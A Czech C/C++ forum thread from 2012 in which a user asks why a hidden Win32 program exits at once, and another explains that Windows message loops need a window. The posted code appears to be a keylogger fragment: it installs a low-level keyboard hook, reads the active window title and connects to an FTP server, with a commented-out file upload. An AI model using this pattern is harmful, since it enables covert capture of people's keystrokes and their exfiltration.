WinApi bez okna – C / C++ – Fórum – Programujte.com
 x   TIP: Přetáhni ikonu na hlavní panel pro připnutí webu
Reklama
Reklama

WinApi bez okna – C / C++ – Fórum – Programujte.comWinApi bez okna – C / C++ – Fórum – Programujte.com

 

Toto vlákno bylo označeno za vyřešené.
Hledá se programátor! Plat 1 800 € + bonusy (firma Boxmol.com)
aTTix0
Návštěvník
12. 1. 2012   #1
-
0
-

Zdravím, mám tu program bez okna ve Win32 (není to konzolová aplikace). Ale mám takový problém, program se okamžitě, vypne, jen co přejede všechny řádky. Vypne se, ikdyž je jsem tam měl while, ale jakoby ho přeskočil a jel dál. Potřebuju nějak udělat aby se nevypl, jedinná věc která ho zastavila byla MessageBox, ale ten nepotřebuji. Lze to nějak provést ?

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {

	GetWindowTextA(GetForegroundWindow(), cWindow, sizeof(cWindow));
	
	HHOOK keyboardHook = SetWindowsHookEx(
		WH_KEYBOARD_LL,
		keyboardHookProc,
		hInstance,
		0);

	internet = InternetOpen(("Naš ftp client"),INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,INTERNET_FLAG_ASYNC);

	if(internet==NULL)
	{
		MessageBox(NULL,("Nepodarilo sa pripojiť k internetu. \nProsím skontrolujte stav Vášho pripojenia!"),("Chyba"),MB_OK | MB_ICONWARNING);
	}

	ftp = InternetConnect(internet,"********",INTERNET_DEFAULT_FTP_PORT,"*****","******",INTERNET_SERVICE_FTP,INTERNET_FLAG_PASSIVE ,NULL);
	if(ftp==NULL)
	{
		MessageBox(NULL,("Nepodarilo sa pripojiť K FTP!!!"),("Chyba"),MB_OK | MB_ICONWARNING);
	}

	/*  -->>>>>>  NAHRAVANI!!
	if(!FtpPutFile(ftp,nahraj,remotef,FTP_TRANSFER_TYPE_BINARY,NULL)) {
		MessageBox(NULL, "chyba v nahravani.", "Information", MB_OK);
	} */

	// MessageBox(NULL, "Press OK to stop logging.", "Information", MB_OK);


        -- zde jsem zkoušel smyčku aby se program nevypl.

	out.close();
	
	return 0;
}
Nahlásit jako SPAM
IP: 88.100.180.–
Reklama
Reklama
yaqwsx+9
Posthunter
12. 1. 2012   #2
-
0
-

Z logiky WinAPI program okno musí mít. Protože pouze okna můžou přijímat zprávy a zpracovávat je. Toto okno však nemusí být zobrazené (což je mimochodem defaultní stav po vytvoření).

Ve WinMain tedy musíš mít smyčku zachytávající zprávy a samotný kód musíš mít v proceduře okna (popř. vytvořit vlákno a ve vlákně provádět, co je třeba - okno však stále musí existovat, aby mohlo zpracovávat zprávy)

Nahlásit jako SPAM
IP: 85.160.124.–
Life is too short to remove USB mass storage safely...
Správný drsňák udělá z konzole cokoliv
aTTix0
Návštěvník
12. 1. 2012   #3
-
0
-

Ok, to jsem potřeboval vědět. Díky

Nahlásit jako SPAM
IP: 88.100.180.–
Zjistit počet nových příspěvků

Přidej příspěvek

Toto téma je starší jak čtvrt roku – přidej svůj příspěvek jen tehdy, máš-li k tématu opravdu co říct!

Ano, opravdu chci reagovat → zobrazí formulář pro přidání příspěvku

×Vložení zdrojáku

×Vložení obrázku

Vložit URL obrázku Vybrat obrázek na disku
Vlož URL adresu obrázku:
Klikni a vyber obrázek z počítače:

×Vložení videa

Aktuálně jsou podporována videa ze serverů YouTube, Vimeo a Dailymotion.
×
 
Podporujeme Gravatara.
Zadej URL adresu Avatara (40 x 40 px) nebo emailovou adresu pro použití Gravatara.
Email nikam neukládáme, po získání Gravatara je zahozen.
-
Pravidla pro psaní příspěvků, používej diakritiku. ENTER pro nový odstavec, SHIFT + ENTER pro nový řádek.
Sledovat nové příspěvky (pouze pro přihlášené)
Sleduj vlákno a v případě přidání nového příspěvku o tom budeš vědět mezi prvními.
Reaguješ na příspěvek:

Uživatelé prohlížející si toto vlákno

Uživatelé on-line: 0 registrovaných, 77 hostů

Moderátoři diskuze

 

Hostujeme u Českého hostingu       ISSN 1801-1586       ⇡ Nahoru Webtea.cz logo © 20032016 Programujte.com
Zasadilo a pěstuje Webtea.cz, šéfredaktor Lukáš Churý